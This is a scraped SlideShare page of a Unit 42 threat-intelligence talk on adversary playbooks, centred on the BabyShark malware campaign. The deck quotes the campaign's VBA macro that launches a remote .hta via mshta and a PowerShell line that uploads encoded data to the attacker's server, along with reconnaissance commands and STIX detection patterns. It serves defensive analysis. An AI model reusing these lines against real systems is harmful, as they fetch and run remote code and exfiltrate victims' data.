SlideShare una empresa de Scribd logo
1 de 32
Unit 42 Adversary Playbooks
Alex Hinchliffe
Threat Intelligence Analyst
Agenda
• Introductions
• Information sharing partnerships
• Case study: BabyShark
• Adversary Playbooks
LIFE THE UNIVERSE EVERYTHING
OUR MISSION
ANALYZE THE DATA AVAILABLE TO PALO ALTO NETWORKS TO
IDENTIFY ADVERSARIES, THEIR MOTIVATIONS, RESOURCES, AND
TACTICS TO BETTER UNDERSTAND THE THREATS OUR
CUSTOMERS FACE
https://unit42.paloaltonetworks.com @Unit42_Intel
Cyber Threat Alliance
Charter Members:
Affiliate Members:
Contributing Members:
1. To share threat information in order to
improve defenses against advanced
cyber adversaries across member
organizations and their customers.
2. To advance the cybersecurity of
critical information technology
infrastructures.
3. To increase the security, availability,
integrity and efficiency of information
systems.
Mission…
“Foster relationships
with SOC, IR and
CERT teams from
customers, partners
and organisations in
EMEA to collaborate
and share threat
information.”
60+ Members…
Threat Information Sharing Program (TISP)
Case Study: BabyShark
BabyShark “Top Trumps”
Language VBS
Debut year 2018
Key Interests Universities and Think-tanks
Hobbies Espionage
(related to nuclear security and Korean peninsula)
Best friends KimJongRAT and STOLEN PENCIL
Works for Kimsuky Group
(aka Velvet Chollima, THALLIUM, Nickel Foxcroft)
Special powers Cryptocurrency mining
Family members 4
ATTACK LIFE CYCLE
RECON
WEAPONIZATION
DELIVERY INSTALLATION
EXPLOITATIO
N
COMMAND
& CONTROL
OBJECTIVE
WEAPONIZATION
Excel Macro-Enabled Add-In file
“Hamre-re-NK-deterrence-CWIR-19-Nov18.xlam”
DELIVERY
Sub AutoOpen()
Shell (“mshta
https://tdalpacafarm[.]com/files/kr/contents/Vkggy0.hta”)
End Sub
EXPLOITATIO
N
HKCUSoftwareMicrosoftOffice14.0ExcelSecurityVBAWarnings
, value:1
whoami
hostname
ipconfig /all
net user
dir “%programfiles%”; “%programfiles% (x86)”; ……...
tasklist
ver
set
reg query “HKEY_CURRENT_USERSoftwareMicrosoftTerminal
Server ClientDefault”
INSTALLATION
COMMAND
& CONTROL
retu=wShell.run(“certutil -f -encode “””&ttmp&”””
“””&ttmp1&””””,0,true)
retu=wShell.run(“powershell.exe (New-Object
System.Net.WebClient).UploadFile(‘https://tdalpacafarm
[.]com/files/kr/contents/upload.php’,'”&ttmp1&”‘);del
“””&ttmp1&”””;del “””&ttmp&””””,0,true)
• Espionage related to nuclear security;
• Espionage related to Korean peninsula’s national security issues;
• Financial gain with focus on the cryptocurrency
OBJECTIVE
Command Name Description
getfiles Archive all files in the BabyShark base path as a ZIP archive, then upload to the C2
exe_down Download further payloads
redirect_vbs Possible C2 path change
OBJECTIVE
Command Name Description
keyhook Start key loggers implemented using PowerShell (available on GitHub) or custom C#
dir list Collect host information using: whoami, hostname, ipconfig, net user, arp -a, dir (various), vol and
tasklist
power com Load DLL component
exe del Clean up all files associated with secondary payload execution
execute Execute payloads
Adversary Playbooks
ADVERSARY PLAYBOOK CONCEPT
An Adversary's Playbook is the
organized collection of the
Techniques, Tactics and Procedures
(TTP) they employ when launching
cyber-attacks. As adversaries do not
share their playbooks with defenders,
we must derive them through
observations of live attacks, shared
information and intelligence analysis.
Deconstructing the Attack Life Cycle
COMMAND
& CONTROL
Custom Command and Control
Fallback Channels
Data Encoding
2.0
STIX 2.0
Structured Threat
Information
Expression (STIX™)
is a language and
serialization format
used to exchange
cyber threat
intelligence
ATT&CK
MITRE’s Adversarial
Tactics, Techniques,
and Common
Knowledge
(ATT&CK™) is a
curated knowledge
base and model for
cyber adversary
behavior
A linear, phase-
based process an
adversary must
complete to
successfully
execute an attack
STIX 2.0ATT&CK
ATTACK LIFE
CYCLE
PLAYBOOKS
A method of
organizing tactics,
tools, and
procedures
adversaries used in
a structured data
format
ATTACK LIFECYCLE
ADVERSARY
ATTACK LIFE CYCLE
IDENTIFIED TACTICS
INDICATORS
PLAYBOOK
PLAYS
ATT&CK
Identify business
relationships
RECON
Obfuscate or
encrypt code
PowerShell Scripting
mshta
Hidden Files and
Directories
Logon Scripts
windows-registry-key:key = 'HKCUSoftwareMicrosoftCommand
ProcessorAutoRun' AND
windows-registry-key:values[*].data LIKE '%powershell.exe%mshta%.hta%'
INSTALLATION
Standard
Application Layer
Protocol
Data Encoding Remote File Copy
BabyShark uses HTTPS for C2
domain-name:value = 'tdalpacafarm[.]com'
COMMAND
& CONTROL
Campaign 1
Recon Weaponize Delivery Exploit Install C2 Act on Obj.
Identify business
relationships
Acquire OSINT data sets
and information
Obtain
templates/branding
materials
Acquire and/or use 3rd
party infrastructure
services
Remote access tool
development
Install and configure
hardware, network, and
systems
Obfuscate or encrypt
code
Obtain/re-use payloads
Buy domain name
Create custom payloads
Conduct social
engineering or HUMINT
operation
Spear phishing messages
with malicious
attachments
Authorized user
performs requested
cyber action
Hidden Files and
Directories
Process Injection
Rundll32
Software Packing
Scripting
Remote File Copy
Data Encoding
Standard Application
Layer Protocol
Process Discovery
Automated Collection
Screen Capture
Clipboard Data
System Network
Configuration Discovery
File and Directory
Discovery
Logon Scripts
Host-based hiding
techniques
Misattributable
credentials
Obtain/re-use payloads
Buy domain name
Create custom payloads
Spear phishing messages
with malicious
attachments
Authorized user
performs requested
cyber action
Confirmation of
launched compromise
achieved
Custom Cryptographic
Protocol
Standard Application
Layer Protocol
Commonly Used Port
System Information
Discovery
Campaign 2
Campaign 1
Recon Weaponize Delivery Exploit Install C2 Act on Obj.
Identify business
relationships
Acquire OSINT data sets
and information
Obtain
templates/branding
materials
Acquire and/or use 3rd
party infrastructure
services
Remote access tool
development
Install and configure
hardware, network, and
systems
Obfuscate or encrypt
code
Obtain/re-use payloads
Buy domain name
Create custom payloads
Conduct social
engineering or HUMINT
operation
Spear phishing messages
with malicious
attachments
Authorized user
performs requested
cyber action
Hidden Files and
Directories
Process Injection
Rundll32
Software Packing
Scripting
Remote File Copy
Data Encoding
Standard Application
Layer Protocol
Process Discovery
Automated Collection
Screen Capture
Clipboard Data
System Network
Configuration Discovery
File and Directory
Discovery
Logon Scripts
Host-based hiding
techniques
Misattributable
credentials
Obtain/re-use payloads
Buy domain name
Create custom payloads
Spear phishing messages
with malicious
attachments
Authorized user
performs requested
cyber action
Confirmation of
launched compromise
achieved
Custom Cryptographic
Protocol
Standard Application
Layer Protocol
Commonly Used Port
System Information
Discovery
Campaign 2
How should
people use
this?
Simulations
Ranges
Defence
Evaluations
Cyber Threat
Alliance
Defence #1
Defence #2
Defence #3
Defence Priorities
Your Top 10
Adversaries
Distinct
TTPs
Defences
https://pan-unit42.github.io/playbook_viewer/
THANK YOU
unit42.paloaltonetworks.com
Twitter: @AlexHinchliffe, @Unit42_Intel

Más contenido relacionado

La actualidad más candente

Red teaming probably isn't for you
Red teaming probably isn't for youRed teaming probably isn't for you
Red teaming probably isn't for youToby Kohlenberg
 
ATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat IntelligenceATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat IntelligenceMITRE - ATT&CKcon
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0Michael Gough
 
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows toolIntroducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows toolMichael Gough
 
Sécurité des Systèmes d'Information et de l'Information
Sécurité des Systèmes d'Information et de l'InformationSécurité des Systèmes d'Information et de l'Information
Sécurité des Systèmes d'Information et de l'InformationShema Labidi
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewMichael Furman
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Landing on Jupyter: The transformative power of data-driven storytelling for ...
Landing on Jupyter: The transformative power of data-driven storytelling for ...Landing on Jupyter: The transformative power of data-driven storytelling for ...
Landing on Jupyter: The transformative power of data-driven storytelling for ...MITRE ATT&CK
 
From Theory to Practice: How My ATTACK Perspectives Have Changed
From Theory to Practice: How My ATTACK Perspectives Have ChangedFrom Theory to Practice: How My ATTACK Perspectives Have Changed
From Theory to Practice: How My ATTACK Perspectives Have ChangedMITRE - ATT&CKcon
 
Sécurité informatique - Etat des menaces
Sécurité informatique - Etat des menacesSécurité informatique - Etat des menaces
Sécurité informatique - Etat des menacesMaxime ALAY-EDDINE
 
Splunk for Security-Hands On
Splunk for Security-Hands OnSplunk for Security-Hands On
Splunk for Security-Hands OnSplunk
 
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesPurple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesJorge Orchilles
 
Cybersecurity
CybersecurityCybersecurity
CybersecurityA. Shamel
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
mastering-kali-linux-for-advanced-penetration-testing-book-look2linux-com.pdf
mastering-kali-linux-for-advanced-penetration-testing-book-look2linux-com.pdfmastering-kali-linux-for-advanced-penetration-testing-book-look2linux-com.pdf
mastering-kali-linux-for-advanced-penetration-testing-book-look2linux-com.pdfManiacH1
 
Lecture_10_AML_in_Network_Intrusion_Detection (3).pptx
Lecture_10_AML_in_Network_Intrusion_Detection (3).pptxLecture_10_AML_in_Network_Intrusion_Detection (3).pptx
Lecture_10_AML_in_Network_Intrusion_Detection (3).pptxAditi943522
 
Cyber security fundamentals
Cyber security fundamentalsCyber security fundamentals
Cyber security fundamentalsCloudflare
 

La actualidad más candente (20)

Red teaming probably isn't for you
Red teaming probably isn't for youRed teaming probably isn't for you
Red teaming probably isn't for you
 
ATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat IntelligenceATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat Intelligence
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0
 
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows toolIntroducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
 
Sécurité des Systèmes d'Information et de l'Information
Sécurité des Systèmes d'Information et de l'InformationSécurité des Systèmes d'Information et de l'Information
Sécurité des Systèmes d'Information et de l'Information
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's New
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Landing on Jupyter: The transformative power of data-driven storytelling for ...
Landing on Jupyter: The transformative power of data-driven storytelling for ...Landing on Jupyter: The transformative power of data-driven storytelling for ...
Landing on Jupyter: The transformative power of data-driven storytelling for ...
 
Cyber kill chain
Cyber kill chainCyber kill chain
Cyber kill chain
 
From Theory to Practice: How My ATTACK Perspectives Have Changed
From Theory to Practice: How My ATTACK Perspectives Have ChangedFrom Theory to Practice: How My ATTACK Perspectives Have Changed
From Theory to Practice: How My ATTACK Perspectives Have Changed
 
Sécurité informatique - Etat des menaces
Sécurité informatique - Etat des menacesSécurité informatique - Etat des menaces
Sécurité informatique - Etat des menaces
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
Splunk for Security-Hands On
Splunk for Security-Hands OnSplunk for Security-Hands On
Splunk for Security-Hands On
 
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesPurple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
 
Cybersecurity
CybersecurityCybersecurity
Cybersecurity
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 
mastering-kali-linux-for-advanced-penetration-testing-book-look2linux-com.pdf
mastering-kali-linux-for-advanced-penetration-testing-book-look2linux-com.pdfmastering-kali-linux-for-advanced-penetration-testing-book-look2linux-com.pdf
mastering-kali-linux-for-advanced-penetration-testing-book-look2linux-com.pdf
 
Lecture_10_AML_in_Network_Intrusion_Detection (3).pptx
Lecture_10_AML_in_Network_Intrusion_Detection (3).pptxLecture_10_AML_in_Network_Intrusion_Detection (3).pptx
Lecture_10_AML_in_Network_Intrusion_Detection (3).pptx
 
IDS and IPS
IDS and IPSIDS and IPS
IDS and IPS
 
Cyber security fundamentals
Cyber security fundamentalsCyber security fundamentals
Cyber security fundamentals
 

Similar a The adversary playbook - the tools, techniques and procedures used by threat actors

MITRE_ATTACK_Enterprise_11x17.pdf
MITRE_ATTACK_Enterprise_11x17.pdfMITRE_ATTACK_Enterprise_11x17.pdf
MITRE_ATTACK_Enterprise_11x17.pdfAisyiFree
 
Internal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guideInternal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guideDarin Fredde
 
Operational Security Intelligence
Operational Security IntelligenceOperational Security Intelligence
Operational Security IntelligenceSplunk
 
Best Practices for Scoping Infections and Disrupting Breaches
Best Practices for Scoping Infections and Disrupting BreachesBest Practices for Scoping Infections and Disrupting Breaches
Best Practices for Scoping Infections and Disrupting BreachesSplunk
 
Anomali Detect 19 - Nickels & Pennington - Turning Intelligence into Action w...
Anomali Detect 19 - Nickels & Pennington - Turning Intelligence into Action w...Anomali Detect 19 - Nickels & Pennington - Turning Intelligence into Action w...
Anomali Detect 19 - Nickels & Pennington - Turning Intelligence into Action w...Adam Pennington
 
OSCON 2018 Getting Started with Hyperledger Indy
OSCON 2018 Getting Started with Hyperledger IndyOSCON 2018 Getting Started with Hyperledger Indy
OSCON 2018 Getting Started with Hyperledger IndyTracy Kuhrt
 
Cisco Connect 2018 Malaysia - Cybersecurity strategy-an integrated approach
Cisco Connect 2018 Malaysia - Cybersecurity strategy-an integrated approachCisco Connect 2018 Malaysia - Cybersecurity strategy-an integrated approach
Cisco Connect 2018 Malaysia - Cybersecurity strategy-an integrated approachNetworkCollaborators
 
Infragard HiKit FLASH Alert.
Infragard HiKit FLASH Alert.Infragard HiKit FLASH Alert.
Infragard HiKit FLASH Alert.Travis
 
Application of Machine Learning in Cybersecurity
Application of Machine Learning in CybersecurityApplication of Machine Learning in Cybersecurity
Application of Machine Learning in CybersecurityPratap Dangeti
 
Threat intel- -content-curation-organizing-the-path-to-successful-detection
Threat intel- -content-curation-organizing-the-path-to-successful-detectionThreat intel- -content-curation-organizing-the-path-to-successful-detection
Threat intel- -content-curation-organizing-the-path-to-successful-detectionPriyanka Aash
 
What are the best tools used in cybersecurity in 2023.pdf
What are the best tools used in cybersecurity in 2023.pdfWhat are the best tools used in cybersecurity in 2023.pdf
What are the best tools used in cybersecurity in 2023.pdftsaaroacademy
 
Port of seattle security presentation david morris
Port of seattle security presentation   david morrisPort of seattle security presentation   david morris
Port of seattle security presentation david morrisEmily2014
 
technical-information-gathering-slides.pdf
technical-information-gathering-slides.pdftechnical-information-gathering-slides.pdf
technical-information-gathering-slides.pdfMarceloCunha571649
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopErnest Staats
 
Inception framework
Inception frameworkInception framework
Inception framework한익 주
 
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation PlansEvolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation PlansChristopher Korban
 
How to protect your corporate from advanced attacks
How to protect your corporate from advanced attacksHow to protect your corporate from advanced attacks
How to protect your corporate from advanced attacksMicrosoft
 

Similar a The adversary playbook - the tools, techniques and procedures used by threat actors (20)

MITRE_ATTACK_Enterprise_11x17.pdf
MITRE_ATTACK_Enterprise_11x17.pdfMITRE_ATTACK_Enterprise_11x17.pdf
MITRE_ATTACK_Enterprise_11x17.pdf
 
Internal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guideInternal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guide
 
Operational Security Intelligence
Operational Security IntelligenceOperational Security Intelligence
Operational Security Intelligence
 
Best Practices for Scoping Infections and Disrupting Breaches
Best Practices for Scoping Infections and Disrupting BreachesBest Practices for Scoping Infections and Disrupting Breaches
Best Practices for Scoping Infections and Disrupting Breaches
 
Anomali Detect 19 - Nickels & Pennington - Turning Intelligence into Action w...
Anomali Detect 19 - Nickels & Pennington - Turning Intelligence into Action w...Anomali Detect 19 - Nickels & Pennington - Turning Intelligence into Action w...
Anomali Detect 19 - Nickels & Pennington - Turning Intelligence into Action w...
 
OSCON 2018 Getting Started with Hyperledger Indy
OSCON 2018 Getting Started with Hyperledger IndyOSCON 2018 Getting Started with Hyperledger Indy
OSCON 2018 Getting Started with Hyperledger Indy
 
Cisco Connect 2018 Malaysia - Cybersecurity strategy-an integrated approach
Cisco Connect 2018 Malaysia - Cybersecurity strategy-an integrated approachCisco Connect 2018 Malaysia - Cybersecurity strategy-an integrated approach
Cisco Connect 2018 Malaysia - Cybersecurity strategy-an integrated approach
 
Infragard HiKit FLASH Alert.
Infragard HiKit FLASH Alert.Infragard HiKit FLASH Alert.
Infragard HiKit FLASH Alert.
 
Application of Machine Learning in Cybersecurity
Application of Machine Learning in CybersecurityApplication of Machine Learning in Cybersecurity
Application of Machine Learning in Cybersecurity
 
Threat intel- -content-curation-organizing-the-path-to-successful-detection
Threat intel- -content-curation-organizing-the-path-to-successful-detectionThreat intel- -content-curation-organizing-the-path-to-successful-detection
Threat intel- -content-curation-organizing-the-path-to-successful-detection
 
What are the best tools used in cybersecurity in 2023.pdf
What are the best tools used in cybersecurity in 2023.pdfWhat are the best tools used in cybersecurity in 2023.pdf
What are the best tools used in cybersecurity in 2023.pdf
 
Port of seattle security presentation david morris
Port of seattle security presentation   david morrisPort of seattle security presentation   david morris
Port of seattle security presentation david morris
 
technical-information-gathering-slides.pdf
technical-information-gathering-slides.pdftechnical-information-gathering-slides.pdf
technical-information-gathering-slides.pdf
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
 
BO2K Byline
BO2K BylineBO2K Byline
BO2K Byline
 
Inception framework
Inception frameworkInception framework
Inception framework
 
Cisco SecureX.pdf
Cisco SecureX.pdfCisco SecureX.pdf
Cisco SecureX.pdf
 
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation PlansEvolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
 
How to protect your corporate from advanced attacks
How to protect your corporate from advanced attacksHow to protect your corporate from advanced attacks
How to protect your corporate from advanced attacks
 
Network security
Network securityNetwork security
Network security
 

Más de Jisc

International students’ digital experience: understanding and mitigating the ...
International students’ digital experience: understanding and mitigating the ...International students’ digital experience: understanding and mitigating the ...
International students’ digital experience: understanding and mitigating the ...Jisc
 
Digital Storytelling Community Launch!.pptx
Digital Storytelling Community Launch!.pptxDigital Storytelling Community Launch!.pptx
Digital Storytelling Community Launch!.pptxJisc
 
Open Access book publishing understanding your options (1).pptx
Open Access book publishing understanding your options (1).pptxOpen Access book publishing understanding your options (1).pptx
Open Access book publishing understanding your options (1).pptxJisc
 
Scottish Universities Press supporting authors with requirements for open acc...
Scottish Universities Press supporting authors with requirements for open acc...Scottish Universities Press supporting authors with requirements for open acc...
Scottish Universities Press supporting authors with requirements for open acc...Jisc
 
How Bloomsbury is supporting authors with UKRI long-form open access requirem...
How Bloomsbury is supporting authors with UKRI long-form open access requirem...How Bloomsbury is supporting authors with UKRI long-form open access requirem...
How Bloomsbury is supporting authors with UKRI long-form open access requirem...Jisc
 
Jisc Northern Ireland Strategy Forum 2023
Jisc Northern Ireland Strategy Forum 2023Jisc Northern Ireland Strategy Forum 2023
Jisc Northern Ireland Strategy Forum 2023Jisc
 
Jisc Scotland Strategy Forum 2023
Jisc Scotland Strategy Forum 2023Jisc Scotland Strategy Forum 2023
Jisc Scotland Strategy Forum 2023Jisc
 
Jisc stakeholder strategic update 2023
Jisc stakeholder strategic update 2023Jisc stakeholder strategic update 2023
Jisc stakeholder strategic update 2023Jisc
 
JISC Presentation.pptx
JISC Presentation.pptxJISC Presentation.pptx
JISC Presentation.pptxJisc
 
Community-led Open Access Publishing webinar.pptx
Community-led Open Access Publishing webinar.pptxCommunity-led Open Access Publishing webinar.pptx
Community-led Open Access Publishing webinar.pptxJisc
 
The Open Access Community Framework (OACF) 2023 (1).pptx
The Open Access Community Framework (OACF) 2023 (1).pptxThe Open Access Community Framework (OACF) 2023 (1).pptx
The Open Access Community Framework (OACF) 2023 (1).pptxJisc
 
Are we onboard yet University of Sussex.pptx
Are we onboard yet University of Sussex.pptxAre we onboard yet University of Sussex.pptx
Are we onboard yet University of Sussex.pptxJisc
 
JiscOAWeek_LAIR_slides_October2023.pptx
JiscOAWeek_LAIR_slides_October2023.pptxJiscOAWeek_LAIR_slides_October2023.pptx
JiscOAWeek_LAIR_slides_October2023.pptxJisc
 
UWP OA Week Presentation (1).pptx
UWP OA Week Presentation (1).pptxUWP OA Week Presentation (1).pptx
UWP OA Week Presentation (1).pptxJisc
 
An introduction to Cyber Essentials
An introduction to Cyber EssentialsAn introduction to Cyber Essentials
An introduction to Cyber EssentialsJisc
 
MarkChilds.pptx
MarkChilds.pptxMarkChilds.pptx
MarkChilds.pptxJisc
 
RStrachanOct23.pptx
RStrachanOct23.pptxRStrachanOct23.pptx
RStrachanOct23.pptxJisc
 
ISDX2 Oct 2023 .pptx
ISDX2 Oct 2023 .pptxISDX2 Oct 2023 .pptx
ISDX2 Oct 2023 .pptxJisc
 
FerrellWalker.pptx
FerrellWalker.pptxFerrellWalker.pptx
FerrellWalker.pptxJisc
 
ExpertsknightOct23.pptx
ExpertsknightOct23.pptxExpertsknightOct23.pptx
ExpertsknightOct23.pptxJisc
 

Más de Jisc (20)

International students’ digital experience: understanding and mitigating the ...
International students’ digital experience: understanding and mitigating the ...International students’ digital experience: understanding and mitigating the ...
International students’ digital experience: understanding and mitigating the ...
 
Digital Storytelling Community Launch!.pptx
Digital Storytelling Community Launch!.pptxDigital Storytelling Community Launch!.pptx
Digital Storytelling Community Launch!.pptx
 
Open Access book publishing understanding your options (1).pptx
Open Access book publishing understanding your options (1).pptxOpen Access book publishing understanding your options (1).pptx
Open Access book publishing understanding your options (1).pptx
 
Scottish Universities Press supporting authors with requirements for open acc...
Scottish Universities Press supporting authors with requirements for open acc...Scottish Universities Press supporting authors with requirements for open acc...
Scottish Universities Press supporting authors with requirements for open acc...
 
How Bloomsbury is supporting authors with UKRI long-form open access requirem...
How Bloomsbury is supporting authors with UKRI long-form open access requirem...How Bloomsbury is supporting authors with UKRI long-form open access requirem...
How Bloomsbury is supporting authors with UKRI long-form open access requirem...
 
Jisc Northern Ireland Strategy Forum 2023
Jisc Northern Ireland Strategy Forum 2023Jisc Northern Ireland Strategy Forum 2023
Jisc Northern Ireland Strategy Forum 2023
 
Jisc Scotland Strategy Forum 2023
Jisc Scotland Strategy Forum 2023Jisc Scotland Strategy Forum 2023
Jisc Scotland Strategy Forum 2023
 
Jisc stakeholder strategic update 2023
Jisc stakeholder strategic update 2023Jisc stakeholder strategic update 2023
Jisc stakeholder strategic update 2023
 
JISC Presentation.pptx
JISC Presentation.pptxJISC Presentation.pptx
JISC Presentation.pptx
 
Community-led Open Access Publishing webinar.pptx
Community-led Open Access Publishing webinar.pptxCommunity-led Open Access Publishing webinar.pptx
Community-led Open Access Publishing webinar.pptx
 
The Open Access Community Framework (OACF) 2023 (1).pptx
The Open Access Community Framework (OACF) 2023 (1).pptxThe Open Access Community Framework (OACF) 2023 (1).pptx
The Open Access Community Framework (OACF) 2023 (1).pptx
 
Are we onboard yet University of Sussex.pptx
Are we onboard yet University of Sussex.pptxAre we onboard yet University of Sussex.pptx
Are we onboard yet University of Sussex.pptx
 
JiscOAWeek_LAIR_slides_October2023.pptx
JiscOAWeek_LAIR_slides_October2023.pptxJiscOAWeek_LAIR_slides_October2023.pptx
JiscOAWeek_LAIR_slides_October2023.pptx
 
UWP OA Week Presentation (1).pptx
UWP OA Week Presentation (1).pptxUWP OA Week Presentation (1).pptx
UWP OA Week Presentation (1).pptx
 
An introduction to Cyber Essentials
An introduction to Cyber EssentialsAn introduction to Cyber Essentials
An introduction to Cyber Essentials
 
MarkChilds.pptx
MarkChilds.pptxMarkChilds.pptx
MarkChilds.pptx
 
RStrachanOct23.pptx
RStrachanOct23.pptxRStrachanOct23.pptx
RStrachanOct23.pptx
 
ISDX2 Oct 2023 .pptx
ISDX2 Oct 2023 .pptxISDX2 Oct 2023 .pptx
ISDX2 Oct 2023 .pptx
 
FerrellWalker.pptx
FerrellWalker.pptxFerrellWalker.pptx
FerrellWalker.pptx
 
ExpertsknightOct23.pptx
ExpertsknightOct23.pptxExpertsknightOct23.pptx
ExpertsknightOct23.pptx
 

Último

MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesMuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesManik S Magar
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Kaya Weers
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Farhan Tariq
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024TopCSSGallery
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
